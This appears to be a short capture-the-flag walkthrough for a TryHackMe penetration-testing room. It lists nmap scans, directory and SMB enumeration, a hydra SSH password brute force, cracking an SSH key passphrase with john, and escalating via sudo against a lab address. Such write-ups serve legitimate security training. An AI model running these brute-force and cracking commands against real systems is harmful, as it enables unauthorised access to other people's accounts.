Try Hack ME — Basic Pentesting

Reconnaissance

nmap -sC -sV -O -oA simple_scan 10.10.28.113
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan
nmap -sC -sV -O -p- -oA full_scan 10.10.28.113
nmap -sU -O -p- -oA udp_scan 10.10.28.113

Enumeration

python3 dirsearch.py -u http://10.10.28.113/ -e *
  1. SMB has been configured.
  2. Apache structs version 2.5.12 running
  3. J’s password is weak and easily crack-able.
smbclinet -L 10.10.28.113
smbclinet //10.10.28.113/Anonymous
cat staff.txt
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 ssh://10.10.28.113
python /usr/share/john/ssh2john.py basic_key > basic_key_hash
john --wordlist=/usr/share/wordlists/rockyou.txt basic_key_hash
chmod 600 basic_key
ssh -i basic_key kay@10.10.28.113

Privilege Escalation

sudo -l
sudo su

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store